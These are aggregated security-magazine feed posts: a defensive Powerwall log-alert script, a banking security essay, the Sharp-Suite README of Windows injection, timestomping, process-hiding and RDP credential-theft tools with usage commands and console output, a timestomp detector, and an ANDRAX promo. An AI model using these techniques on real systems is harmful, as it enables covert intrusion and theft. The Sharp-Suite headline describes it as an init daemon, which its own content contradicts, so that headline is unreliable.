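The same vantage point serves the owner as well as the researcher. Once the gateway sits behind your own Linux router (Part 1), every HTTP request to it can be logged, and the API list above tells you which calls matter. The following is an added example, not from the THC writeup or from Tesla: a script that reads such a log and raises alerts for calls that change what the Powerwall does (a CT flip, a grid code change, sitemaster stop/run) and for repeated failed logins against /api/login/Basic, and notes when a request came in over the 192.168.91.x management WiFi. The endpoint paths are the ones listed above; the log format, the client addresses, the CT id "1" and the trusted-host list are constructed assumptions.

```python
"""Flag risky calls to a Powerwall gateway's HTTP API in captured traffic.

Added example, not from the THC writeup: reads a constructed router log of
requests to the gateway and alerts on state-changing API calls and on
repeated login failures. Endpoint paths are those listed in the writeup;
the log format, addresses, CT id and trusted-host list are assumptions.
"""
import re
from collections import defaultdict

# Endpoints from the writeup that alter gateway state when POSTed to.
WRITE_ENDPOINTS = [
    re.compile(r"^/api/meters/[^/]+/invert_cts$"),     # flip a CT reading
    re.compile(r"^/api/site_info/grid_code$"),         # change the grid code
    re.compile(r"^/api/operation$"),
    re.compile(r"^/api/powerwalls/update$"),
    re.compile(r"^/api/networks/default_gsm/disable$"),
    re.compile(r"^/api/system/testing$"),
]
# Stop/run are plain GETs in the writeup but still change state.
SITEMASTER_RE = re.compile(r"^/api/sitemaster/(stop|run)$")
LOGIN_PATH = "/api/login/Basic"
MGMT_WIFI_PREFIX = "192.168.91."   # the TEG-xyz management WiFi subnet

# Constructed router log: "<timestamp> <client> <method> <path> <status>".
SAMPLE_LOG = [
    "2019-09-01T02:00:01Z 192.168.91.20 POST /api/login/Basic 401",
    "2019-09-01T02:00:02Z 192.168.91.20 POST /api/login/Basic 401",
    "2019-09-01T02:00:03Z 192.168.91.20 POST /api/login/Basic 401",
    "2019-09-01T02:00:04Z 192.168.91.20 POST /api/login/Basic 200",
    "2019-09-01T02:00:05Z 192.168.91.20 POST /api/meters/1/invert_cts 200",
    "2019-09-01T02:10:00Z 192.168.1.10 GET /api/system_status/soe 200",
    "2019-09-01T02:11:00Z 192.168.1.10 POST /api/site_info/site_name 200",
    "2019-09-01T02:12:00Z 192.168.1.10 GET /api/sitemaster/stop 200",
    "garbage line without a status code",
]
TRUSTED_HOSTS = {"192.168.1.10"}   # constructed: installer laptop on the wired LAN

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$")


def parse_line(line):
    """Return a dict for a well-formed log line, or None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ts": m["ts"], "src": m["src"], "method": m["method"],
            "path": m["path"], "status": int(m["status"])}


def is_state_changing(rec):
    """True for requests that alter what the Powerwall does."""
    if SITEMASTER_RE.match(rec["path"]):
        return True
    return rec["method"] == "POST" and any(p.match(rec["path"]) for p in WRITE_ENDPOINTS)


def _alert(rule, rec):
    return {"rule": rule, "src": rec["src"], "path": rec["path"], "ts": rec["ts"],
            "via_management_wifi": rec["src"].startswith(MGMT_WIFI_PREFIX)}


def analyze(lines, trusted_hosts, max_failures=3):
    """Return alerts for login-guessing and for state changes, trusted or not."""
    alerts, failures = [], defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] == LOGIN_PATH and rec["status"] == 401:
            failures[rec["src"]] += 1
            if failures[rec["src"]] == max_failures:   # report once per client
                alerts.append(_alert("auth_failures", rec))
        if is_state_changing(rec):
            rule = "config_change" if rec["src"] in trusted_hosts else "untrusted_config_change"
            alerts.append(_alert(rule, rec))
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG, TRUSTED_HOSTS):
        where = "mgmt-wifi" if a["via_management_wifi"] else "lan"
        print(f"{a['ts']} {a['rule']:24} {a['src']:15} {where:9} {a['path']}")
```

Trusted hosts still produce a config_change record so that an installer's legitimate CT flip or stop command leaves a trail; only the source decides whether the alert is informational or urgent. Since the write endpoints use HTTP Basic auth with the WiFi password, a burst of 401s on /api/login/Basic from the management subnet is the earliest sign that the default password is being guessed.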

More details: https://github.com/hackerschoice/thc-tesla-powerwall2-hack

 

The post TESLA PowerWall 2 Security Shenanigans appeared first on Hakin9 - IT Security Magazine.

Reasons Why Cybersecurity Is Important In Banking by Mrudul Shah


Business photo created by rawpixel.com - www.freepik.com

Cyber Security is significant for every financial institution, profit-making or non-profit. Banks hold vital information about their clients, and attackers know this very well. So it becomes imperative for banks and financial institutions to have robust Cyber Security in place.

Earlier it was physical theft; then came fraud through computers; and today it is not only cyber fraud but also direct attacks on servers to obtain customers' personally identifiable information (PII).

As people and companies across the world perform most of their banking and financial transactions through diverse online channels, the risk of a data breach keeps increasing. This is why more attention is being paid to information protection and secure transaction processing, and why Cyber Security is important for financial institutions.

The reasons behind the importance of Cyber Security in banks

The key idea behind Cyber Security measures for banks is to safeguard customer assets and their transactions. As both B2C customers and organizations go cashless, financial activities are done via physical card readers and online checkout pages. In both scenarios, PII can be redirected elsewhere and used for malicious purposes.

This affects not only B2B clients and customers. It also considerably hurts the bank as it struggles to recover the data. When the data is held hostage, the bank or financial institution has to pay a significant amount to get it released. In turn, it loses the trust of its customers, other financial institutions and related stakeholders.

Below are a few points that illustrate why Cyber Security is essential in the banking sector.

  • Breaches damage a bank's standing in the financial market

Data breaches are a severe issue for banks because they result in a loss of public trust and leave customers feeling insecure. They occur because of weak Cyber Security practices, and they are not easy to recover from. It is the bank's responsibility to talk with its customers directly about its Cyber Security measures. These measures must deter attacks and shield customers' personal and private information. To gain the confidence of consumers, it is essential for a bank to have a robust Cyber Security plan.

  • Banks can face consequences and penalties for FDIC non-compliance

Penalties for non-compliance can hit banks unexpectedly, not only financially but also through greatly increased regulatory oversight. Having a compliance benchmark drives banks to focus on Cyber Security measures. When a bank remains compliant, it ensures that it is meeting a security standard and safeguarding customer information.

  • Consumers can lose money and time in the event of a data breach

When a bank or financial institution suffers a data breach, consumers lose money and time. A bank may refund the fraudulently spent money in whole or in part; however, this does not work out in every scenario. Dealing with the aftermath of a breach takes effort and time and is stressful for customers. They may have to cancel their bank cards, constantly verify their financial statements, and keep an eye out for technical problems after a breach.

  • Consumer data is sensitive

It is hard for consumers to cope with a data breach when they learn that their data has fallen into the wrong hands. In addition to cancelling the affected bank cards and dealing with the fraud, a customer is constantly worried because the personal details can be used against them. Once a consumer's private information is stolen, the problem escalates alarmingly and can get out of control. So Cyber Security is all the more significant for banks and financial institutions, as they hold the private data of so many consumers who trust them.

The risks associated with web and mobile banking

Other examples of likely Cyber Security issues in internet and mobile banking include:

  • Risks through mobile apps

More and more individuals access their bank accounts through mobile applications. Many of these users have minimal or no security on their devices, which makes the threat of attack much greater. Hence, secure banking software solutions are necessary to prevent malicious activity.

  • Breaches at third-party organizations

As banks have advanced their Cyber Security, hackers now target shared banking systems and third-party networks to commit fraud. If these are not as well protected as the bank, the hackers can gain access effortlessly.

  • Increased risk from cryptocurrency hacks

In addition to conventional fraud, hacks have increased in the maturing cryptocurrency space. Since the industry is not entirely sure how to operate Cyber Security software for banking in this evolving market, attackers' ability to commit fraud has grown. They try to grab massive amounts of this currency, which benefits from low awareness levels and swiftly jumps in value.

Defending the banking industry against cyber threats with highly secure software

When you look at the current state of online security, you must consider enhancing or entirely replacing your existing defense applications. Here are some important things to look at in the world of banking software development.

  • Having Security Audits - A regular audit is essential before any new Cyber Security software is enabled. The review reveals the strengths and weak spots of the current setup. Furthermore, it offers suggestions that can save money while directing investment precisely.
  • Enabling Firewalls - A Cyber Security setup for banking does not consist only of applications. It also needs the right hardware to block attacks. With an updated firewall, banks can block malicious activity before it reaches other components of the network.
  • Use of Anti-malware Applications - While a firewall update improves protection, it won't prevent attacks unless anti-malware applications are also kept up to date. Old software may not contain the newest rules and virus signatures, and can therefore fail to spot a potentially serious attack on the systems.
  • Multi-factor Authentication (MFA) - This is crucial to safeguard clients who use mobile or web applications for banking transactions. MFA prevents attackers from reaching the system network because it adds several layers of protection.
  • Biometrics - Retina scans, thumbprints and facial recognition are used to verify a user's identity.
  • Automatic Logout - Many sites and apps let a user remain logged in if they choose to. They can then access their information at any time without entering login credentials. However, this also lets attackers obtain those vital records with little difficulty. Automatic logout reduces this risk by ending a user's session after a few minutes of inactivity.
  • Awareness and Education - All of the above measures can improve Cyber Security in the banking business. However, they cannot help if customers keep accessing their information from unprotected locations or handle their login credentials carelessly. This is why awareness and education are essential. When banks inform their customers of the consequences of these vulnerabilities, it may persuade them to change their day-to-day practices to protect themselves from attacks.

About the Author: 

Mrudul Shah is the CTO of Technostacks Infotech, a mobile app development company in India and the USA. He helps his development team and global clients adopt new technologies, and is interested in learning and sharing IT technology news and trends.


The post Reasons Why Cybersecurity Is Important In Banking by Mrudul Shah appeared first on Hakin9 - IT Security Magazine.

Sharp-Suite: A modular, high-performance, modern init daemon in C#


The king is dead, long live the king. I am starting a new repo with code samples in C#. My heart is still with PowerShell <3; let's face it, using in-line C# in PowerShell is a much nicer experience than actually using C#! However, threat emulation has to evolve over time, and so does the tooling.

Pwn?

SwampThing

SwampThing lets you spoof process command line args (x32/64). Essentially you create a process in a suspended state, rewrite the PEB, resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones. Think, for example, about launching a wmic xsl stylesheet for code execution while faking an innocuous wmic command.

C:\>SwampThing.exe -l C:\Windows\System32\notepad.exe -f C:\aaa.txt -r C:\bbb.txt
      /
     :;                \
     |l      _____     |;
     `8o __-~     ~\   d|     Swamp
      "88p;.  -._\_;.oP         Thing
       `>,% (\  (\./)8"
      ,;%%%:  ./V^^^V'
;;;,-::::::'_::\   ||\
8888oooooo.  :\`^^^/,,~--._
 oo.8888888888:`((( o.ooo888
   `o`88888888b` )) 888b8888
     b`888888888;(.,"888b888\
....  b`8888888:::::.`8888.
 `:::. `:::OOO:::::::.`OO' ;
   `.      "``::::::''.'        ~ b33f ~

[>] CreateProcess -> Suspended
[+] PE Arch                       : 64-bit
[+] Process Id                    : 10568
[+] PEB Base                      : 0xA3C2431000
[+] RTL_USER_PROCESS_PARAMETERS   : 0x20DA9760000
[+] CommandLine                   : 0x20DA9760070
[+] UNICODE_STRING |-> Len        : 66
                   |-> MaxLen     : 68
                   |-> pBuff      : 0x20DA9760658

[>] Rewrite -> RTL_USER_PROCESS_PARAMETERS
[+] RtlCreateProcessParametersEx  : 0xEAADF0
[+] RemoteAlloc                   : 0xEA0000
[+] Size                          : 1776
[?] Success, sleeping 500ms..

[>] Reverting RTL_USER_PROCESS_PARAMETERS
[+] Local UNICODE_STRING          : 0xEBC4D0
[+] Remote UNICODE_STRING.Buffer  : 0x20DA9B10000
[+] pRTL_USER_PROCESS_PARAMETERS  : 0x20DA9870FE0
[?] Success rewrote Len, MaxLen, Buffer..

DesertNut

DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate). The pertinent part here is that this does not use any suspect thread creation APIs; instead, as implied, it hijacks window callbacks. DesertNut includes two flags: "-l" to list all potential properties that could be hijacked and "-i" to inject shellcode into explorer and execute notepad. Note that this POC is only designed for x64 (tested on Win10 RS5 & Win7) since it requires custom shellcode with a specific callback function prototype. For further details please see this post by Hexacorn and this post by modexp.

C:\> DesertNut.exe -i
           ,                        '           .        '        ,
   .            .        '       .         ,
                                                   .       '     +
       +          .-'''''-.
                .'         `.   +     .     ________||
       ___     :             :     |       /        ||  .     '___
  ____/   \   :               :   ||.    _/      || ||\_______/   \
 /         \  :      _/|      :   `|| __/      ,.|| ||             \
/  ,   '  . \  :   =/_/      :     |'_______     || ||  ||   .      \
    |        \__`._/ |     .'   ___|        \__   \\||  ||...    ,   \
   l|,   '   (   /  ,|...-'        \   '   ,     __\||_//___
 ___|____     \_/^\/||__    ,    .  ,__             ||//    \    .  ,
           _/~  `''~`'` \_           ''(       ....,||/       '
 ..,...  __/  -'/  `-._ `\_\__        | \           ||  _______   .
              '`  `\   \  \-.\        /(_1_,..      || /
                                            ______/''''

[+] Searching for Subclass property..
[>] PID: 10928, ImageName: explorer
    |-> ParentClassName: Progman, ChildClassName: SHELLDLL_DefView
[+] Duplicating Subclass header..
[>] hProc: 0x378
[>] hProperty: 0x6B14DD0
    |-> uRefs: 2, uAlloc: 3, uCleanup: 0
    |-> dwThreadId: 5804, pFrameCur: 0
    |-> pfnSubclass: 0x7FFA20E42280 --> comctl32!CallOriginalWndProc (?)
    |-> uIdSubclass: 0, dwRefData: 0x7FFA2E4C07D0
[+] Allocating remote shellcode..
    |-> Sc Len: 344
    |-> Sc Address: 0x3220000
[+] Rewriting local SUBCLASS_HEADER..
[+] Allocating remote SUBCLASS_HEADER..
    |-> Subclass header Len: 48
    |-> Subclass header Address: 0x3260000
[+] Updating original UxSubclassInfo subclass procedure..
[+] Trigger remote shellcode --> notepad..
[+] Restoring original UxSubclassInfo subclass procedure..
[+] Freeing remote SUBCLASS_HEADER & shellcode..

C:\> DesertNut.exe -l
           ,                        '           .        '        ,
   .            .        '       .         ,
                                                   .       '     +
       +          .-'''''-.
                .'         `.   +     .     ________||
       ___     :             :     |       /        ||  .     '___
  ____/   \   :               :   ||.    _/      || ||\_______/   \
 /         \  :      _/|      :   `|| __/      ,.|| ||             \
/  ,   '  . \  :   =/_/      :     |'_______     || ||  ||   .      \
    |        \__`._/ |     .'   ___|        \__   \\||  ||...    ,   \
   l|,   '   (   /  ,|...-'        \   '   ,     __\||_//___
 ___|____     \_/^\/||__    ,    .  ,__             ||//    \    .  ,
           _/~  `''~`'` \_           ''(       ....,||/       '
 ..,...  __/  -'/  `-._ `\_\__        | \           ||  _______   .
              '`  `\   \  \-.\        /(_1_,..      || /
                                            ______/''''


[+] Subclassed Window Properties
[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x1BC84BF0, hParentWnd: 0xA0710, hChildWnd: 0x100650
    |-> ParentClassName: Shell_TrayWnd, ChildClassName: Start

[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x1BC84C70, hParentWnd: 0xA0710, hChildWnd: 0x1C064C
    |-> ParentClassName: Shell_TrayWnd, ChildClassName: TrayDummySearchControl

[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x12A64F0, hParentWnd: 0x1C064C, hChildWnd: 0x800E8
    |-> ParentClassName: TrayDummySearchControl, ChildClassName: Button

[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x12A58F0, hParentWnd: 0x1C064C, hChildWnd: 0x1504A4
    |-> ParentClassName: TrayDummySearchControl, ChildClassName: Static

[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x12A5870, hParentWnd: 0x1C064C, hChildWnd: 0x110814
    |-> ParentClassName: TrayDummySearchControl, ChildClassName: ToolbarWindow32

[...Snipped...]

WindfarmDynamite

WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread). The POC overwrites a process level WNF subscription callback which can be triggered by signaling a WNF state name. There currently exists little functionality in Windows to monitor WNF activity. WindfarmDynamite includes two flags: "-l PID" to list all WNF subscriptions for a specific process and "-i" to inject shellcode into explorer and execute notepad. Note that this POC is only designed for x64 (tested on Win10). For further details please see this talk by Alex Ionescu & Gabrielle Viala and this post by modexp.

C:\> WindfarmDynamite.exe -i
.  ..  ..___           .__                 ,
|  ||\ |[__  _.._.._ _ |  \  .._  _.._ _ *-+- _
|/\|| \||   (_][  [ | )|__/\_|[ )(_][ | )| | (/,
                           ._|

[+] Validating Process..
[>] PID: 996, ImageName: explorer
    |-> hProc: 632, Arch: x64

[+] Leaking local WNF_SUBSCRIPTION_TABLE..
[>] TblPtr: 0x7FFD99CB5FA8, NtdllRVA: 1335208

[+] Remote WNF_SUBSCRIPTION_TABLE lookup..
[>] rNtdllBase: 0x7FFD99B70000, rWNFSubTable: 0x5A9120
    |-> NameTable Flink: 0x4A6CA10, NameTable Blink: 0x5BB050

[+] Finding remote subscription -> WNF_SHEL_LOGON_COMPLETE
[>] SubscriptionId: 0xB89, State Name: WNF_SHEL_LOGON_COMPLETE
    |-> WNF_USER_SUBSCRIPTION: 0x49C8E38
    |-> Callback: 0x7FFD82F58C60 => twinui.dll!DllCanUnloadNow
    |-> Context: 0x2A12F40 => N/A

[+] Allocating remote shellcode..
[>] Sc Len: 344
[>] Sc Address: 0x27A0000

[+] Rewriting WNF subscription callback pointer..
[+] NtUpdateWnfStateData -> Trigger shellcode
[+] Restoring WNF subscription callback pointer & deallocating shellcode..

C:\> WindfarmDynamite.exe -l 4132
.  ..  ..___           .__                 ,
|  ||\ |[__  _.._.._ _ |  \  .._  _.._ _ *-+- _
|/\|| \||   (_][  [ | )|__/\_|[ )(_][ | )| | (/,
                           ._|

[+] Validating Process..
[>] PID: 4132, ImageName: vmtoolsd
    |-> hProc: 640, Arch: x64

[+] Leaking local WNF_SUBSCRIPTION_TABLE..
[>] TblPtr: 0x7FFD99CB5FA8, NtdllRVA: 1335208

[+] Remote WNF_SUBSCRIPTION_TABLE lookup..
[>] rNtdllBase: 0x7FFD99B70000, rWNFSubTable: 0x56B2F0
    |-> NameTable Flink: 0x58EA30, NameTable Blink: 0x58F070

[+] Reading remote WNF subscriptions..
[>] SubscriptionId: 0x931, State Name: WNF_ENTR_EDPENFORCEMENTLEVEL_POLICY_VALUE_CHANGED
    |-> WNF_USER_SUBSCRIPTION: 0x4BB5B88
    |-> Callback: 0x7FFD87505DF0 => edputil.dll!EdpIsUIPolicyEvaluationEnabledForThread
    |-> Context: 0x0 => N/A

[>] SubscriptionId: 0x8FA, State Name: WNF_DX_MODE_CHANGE_NOTIFICATION
    |-> WNF_USER_SUBSCRIPTION: 0x5B9658
    |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126
    |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F9, State Name: WNF_DX_MONITOR_CHANGE_NOTIFICATION
    |-> WNF_USER_SUBSCRIPTION: 0x5B9708
    |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126
    |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F8, State Name: WNF_SPI_LOGICALDPIOVERRIDE
    |-> WNF_USER_SUBSCRIPTION: 0x5BA368
    |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126
    |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F4, State Name: WNF_RPCF_FWMAN_RUNNING
    |-> WNF_USER_SUBSCRIPTION: 0x58F828
    |-> Callback: 0x7FFD98610980 => rpcrt4.dll!NdrTypeSize
    |-> Context: 0x0 => N/A

MaceTrap

MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders. These elements can be changed individually, in bulk or can be duplicated from an existing file or folder. Time permitting I will update MaceTrap to include comprehensive PE compile time stomping as well (header, import table, export table, debug directory, resources and fixing up the checksum).

C:\> MaceTrap.exe

    /-|-\   MACE
   [++++||<<>><<>>|===|+
    \-|-/    TRAP             ~b33f~


 >--~~--> Args? <--~~--<

-l (-List)        List FileTime information for a file or folder
-s (-Set)         Set FileTime information for a file or folder
-d (-Duplicate)   Duplicate FileTime information from a file or folder
-t (Time)         String DateTime representation; requires quotes if it contains spaces.
                  All undefined elements are set randomly (YYYY-MM-DD is required!):
                    =>  1999-10-20
                    => "2001-01-02 14:13"
                    => "2019-02-19 01:01:01.111"
-c (-Create)      Boolean flag, overwrite CreationTime
-a (-Access)      Boolean flag, overwrite LastAccessTime
-w (-Write)       Boolean flag, overwrite LastWriteTime

 >--~~--> Usage? <--~~--<

# List all FileTime elements
MaceTrap.exe -l C:\Windows\System32\kernel32.dll
# TimeStomp all FileTime elements
MaceTrap.exe -s C:\Some\Target\file.folder -t "2019-02-19 01:01:01,111"
# TimeStomp CreationTime & LastWriteTime; here HH:MM:SS,MS are randomized
MaceTrap.exe -s C:\Some\Target\file.folder -t 1999-09-09 -c -w
# TimeStomp a file/folder by duplicating the FileTime information from an existing file/folder
MaceTrap.exe -s C:\Some\Target\file.folder -d C:\Windows\System32\kernel32.dll
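Since MaceTrap only rewrites the timestamps that SetFileTime exposes, a defender's check looks at timestamps the caller cannot set. The following is an added Python example, not part of Sharp-Suite: it uses the Linux inode change time (ctime), which os.utime() cannot set, as the OS-maintained anchor (on NTFS the $FILE_NAME attribute timestamps serve the same purpose; treating the two as equivalent is an assumption of this example), simulates a stomp on a constructed temp file, and flags a modification time that is implausibly far behind the change time.

```python
"""Timestomp detection heuristic (added example, not MaceTrap's own code).

A timestomping tool rewrites the timestamps a file-system API lets a caller
set. Some timestamps are maintained by the OS and cannot be set through that
API: on Linux the inode change time (ctime) is bumped by the kernel whenever
metadata changes, and os.utime() cannot override it. A file whose settable
mtime is far older than its ctime has had its timestamps rewritten after the
last write. Assumption: run on Linux/macOS, where st_ctime is the change time.
"""
import os
import tempfile
from datetime import datetime, timezone

# mtime may legitimately trail ctime by a little (e.g. a chmod after a write),
# so only a large gap is treated as suspicious.
SUSPICIOUS_GAP_SECONDS = 60.0


def timestamp_gap(path: str) -> float:
    """Return ctime - mtime in seconds (positive: metadata changed after the last write)."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime


def looks_timestomped(path: str, gap_threshold: float = SUSPICIOUS_GAP_SECONDS) -> bool:
    """Flag a file whose caller-settable mtime is far older than its OS-maintained ctime.

    A freshly written, untouched file has both timestamps nearly equal.
    """
    return timestamp_gap(path) > gap_threshold


def stomp_for_test(path: str, when: datetime) -> None:
    """Simulate a stomp on a constructed test file: rewrite atime/mtime to an
    arbitrary date. os.utime() is the POSIX analogue of SetFileTime; ctime cannot
    be set this way and is updated to 'now' by the kernel, which the detector uses."""
    epoch = when.timestamp()
    os.utime(path, (epoch, epoch))


def demo() -> dict:
    """Create two constructed files, stomp one of them, and return the verdicts."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = os.path.join(tmp, "clean.txt")
        stomped = os.path.join(tmp, "stomped.txt")
        for p in (clean, stomped):
            with open(p, "w") as fh:
                fh.write("constructed sample content\n")
        # Same date the MaceTrap usage text uses as an example: 1999-09-09.
        stomp_for_test(stomped, datetime(1999, 9, 9, tzinfo=timezone.utc))
        return {
            "clean": looks_timestomped(clean),
            "stomped": looks_timestomped(stomped),
            "stomped_gap_days": round(timestamp_gap(stomped) / 86400),
        }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

On a real investigation the same comparison is made between the settable and the non-settable timestamp sets of the file system in question rather than on files the analyst created.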

UrbanBishop

UrbanBishop is a small POC I wrote while I was testing Donut. If you haven't seen or used Donut I highly recommend you have a look at the magic TheWover & odzhan are doing there! This POC creates a local RW section in UrbanBishop and then maps that section as RX into a remote process. Once the shared section has been established, the shellcode is written to the local section, which then automatically propagates to the remote process. For execution, UrbanBishop creates a remote suspended thread (start address is set to ntdll!RtlExitUserThread) and queues an APC on that thread; once resumed with NtAlertResumeThread, the shellcode executes and the thread exits gracefully on completion. The POC can be adapted for inline shellcode, but that was not my use case. I tested UrbanBishop on x64 Win10/Win7.

C:\> UrbanBishop.exe -i 3380 -p C:\Users\b33f\Desktop\sc.bin -c
   _O       _____     _
  / //\    |  |  |___| |_ ___ ___
 {     }   |  |  |  _| . | .'|   |
  \___/    |_____|_| |___|__,|_|_|
  (___)
   |_|          _____ _     _
  /   \        | __  |_|___| |_ ___ ___
 (_____)       | __ -| |_ -|   | . | . |
(_______)      |_____|_|___|_|_|___|  _|
/_______\                          |_|
                       ~b33f~

|--------
| Process    : notepad
| Handle     : 828
| Is x32     : False
| Sc binpath : C:\Users\b33f\Desktop\sc.bin
|--------

[>] Creating local section..
    |-> hSection: 0x338
    |-> Size: 31361
    |-> pBase: 0x2470000
[>] Map RX section to remote proc..
    |-> pRemoteBase: 0x16967970000
[>] Write shellcode to local section..
    |-> Size: 31361
[>] Seek export offset..
    |-> pRemoteNtDllBase: 0x7FFDE64A0000
    |-> LdrGetDllHandle OK
    |-> RtlExitUserThread: 0x7FFDE650CF10
    |-> Offset: 0x6CF10
[>] NtCreateThreadEx -> RtlExitUserThread <- Suspended.. |-> Success
[>] Set APC trigger & resume thread..
    |-> NtQueueApcThread
    |-> NtAlertResumeThread
[>] Waiting for payload to finish..
    |-> Thread exit status -> 0
    |-> NtUnmapViewOfSection

AtomicBird

AtomicBird is a crude POC to demo the use of EasyHook in .Net payloads combined with Costura to pack resources into a single module. AtomicBird has two functions: (1) hook MessageBoxA => print to console / modify parameters => unhook, and (2) hook NtQuerySystemInformation->SystemProcessInformation, search the linked list of SYSTEM_PROCESS_INFORMATION structs to find powershell processes and unlink them. The second function requires that you inject the .Net PE into a process that uses NtQuerySystemInformation (Process Explorer was used for testing); you can do that with execute-assembly or with Donut by generating shellcode. AtomicBird was only tested on x64 Win10.

              .---.        .-----------
             /     \  __  /    ------
            / /     \(  )/    -----  Atomic
           //////   ' \/ `   ---       Bird
          //// / // :    : ---
         // /   /  /`    '--
        //          //..\\      ~b33f~
               ====UU====UU====
                   '//||\\`
                     ''``
Called ==> SystemProcessInformation
Called ==> SystemProcessInformation
Called ==> SystemProcessInformation
Called ==> SystemProcessInformation
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
[!] Found Powershell => rewriting linked list

[...Snipped...]

RemoteViewing

RemoteViewing is a quick POC to demo RDP credential theft through API hooking, using EasyHook for .Net payloads combined with Costura to pack resources into a single module. This is adapted from a post by @0x09AL that you can read here. To use this you have to compile RemoteViewing and then turn it into shellcode with Donut, after which you have to inject that shellcode into mstsc. RemoteViewing will RC2-encrypt any credentials it captures and write them to disk. You can then use Clairvoyant to decrypt the file in memory, read out the results and delete the file.

Windows API

SystemProcessAndThreadsInformation

While working on a side project I had to access out-of-process thread information; to do this I used NtQuerySystemInformation -> SystemProcessAndThreadInformation. As it may be helpful for reference, I wrote a small wrapper around this function to list process and thread information for a specific PID. Note that I am not extracting all available information from SYSTEM_PROCESSES and SYSTEM_THREAD_INFORMATION; feel free to extend the output with a pull request.

C:\> SystemProcessAndThreadsInformation.exe -p 4508

[+] Process Details
    ImageName           : powershell.exe
    ProcessId           : 4508
    ParentPid           : 8256
    HandleCount         : 701
    ThreadCount         : 25
    SessionId           : 1
    Priority            : 8
    CreateTime          : 0d:22h:0m:31s:876ms
    UserTime            : 0d:0h:0m:0s:328ms
    KernelTime          : 0d:0h:0m:0s:281ms
    WorkingSetSize      : 73.52734375 MB
    PeakWorkingSetSize  : 73.5859375 MB
    PageFaultCount      : 26896

[+] Thread Details
[>] TID: 9832, Priority: 9
    |-> StartAddress: 0x7FFB84833670
    |-> Created: 0d:22h:0m:31s:876ms, uTime: 0d:0h:0m:0s:46ms, kTime: 0d:0h:0m:0s:93ms
    |-> WaitTime: 5843708, WaitReason: UserRequest
    |-> State: Wait, ContextSwitches: 232

[>] TID: 5552, Priority: 8
    |-> StartAddress: 0x7FFB84833670
    |-> Created: 0d:22h:0m:31s:970ms, uTime: 0d:0h:0m:0s:15ms, kTime: 0d:0h:0m:0s:15ms
    |-> WaitTime: 5843460, WaitReason: WrQueue
    |-> State: Wait, ContextSwitches: 38

[>] TID: 15716, Priority: 8
    |-> StartAddress: 0x7FFB84833670
    |-> Created: 0d:22h:0m:31s:970ms, uTime: 0d:0h:0m:0s:15ms, kTime: 0d:0h:0m:0s:0ms
    |-> WaitTime: 5843460, WaitReason: WrQueue
    |-> State: Wait, ContextSwitches: 30

[...Snipped...]

More details: https://github.com/FuzzySecurity/Sharp-Suite#remoteviewing


The post Sharp-Suite: A modular, high-performance, modern init daemon in C# appeared first on Hakin9 - IT Security Magazine.

ANDRAX v4 DragonFly - Penetration Testing on Android

ANDRAX is a Penetration Testing platform developed specifically for Android smartphones. ANDRAX runs natively on Android, so it behaves like a common Linux distribution, but it is more powerful than a common distribution!
ANDRAX enables any Android device with root access and a suitable unlocked ROM to become a weapon for advanced Penetration Testing.

Why is Android so powerful?

Simple: everyone has a smartphone and spends all their time with it! This gives us the possibility to blend in easily among everyone else. The processor architecture of most Android smartphones is ARM, a modern and robust architecture that is extremely superior to the rest. With touch screens we can run the tools with great agility and take advantage of Android's graphical interface, and we can get in almost anywhere with our smartphones...
In technical terms, ANDRAX and NetHunter should never be compared: ANDRAX is a penetration testing platform for Android smartphones, while NetHunter is just a Debian emulator running in a chroot.
Termux is not our enemy. Termux is an application that allows the installation of many Linux packages using a Debian environment running natively on Android. ANDRAX and Termux have a similar development approach, and ANDRAX and Termux share many libs and GNU/Linux resources.
But Termux is not a penetration testing platform; it is software that brings the basic tools found in a Debian environment. Penetration tests are not something basic! They are advanced techniques that involve advanced tools and an advanced environment to conduct good tests!
So you can install many tools manually in Termux, but it would be extremely difficult to optimize and configure them to reach 100% of the potential required for penetration testing. Termux runs without root privileges, and this makes it very difficult to use advanced tools. ANDRAX promotes the use of more than 900 advanced tools for Hacking, Cracking and Penetration Testing.

Official page: https://andrax.thecrackertechnology.com/ 

The post ANDRAX v4 DragonFly - Penetration Testing on Android appeared first on Hakin9 - IT Security Magazine.


Top 10 Trends to Watch for Android App Development in 2020 by Sandeep Agarwal


With the advent of advanced technologies, the conventional way of living has transformed. People utilize the latest gadgets that add value to their day to day life and the smartphone is one of such devices. 

According to Statista, the number of mobile phone users across the world is expected to pass the five billion mark by 2019. In the second quarter of 2018, 88 percent of all smartphones sold to end users were phones with the Android operating system, the same source stated.

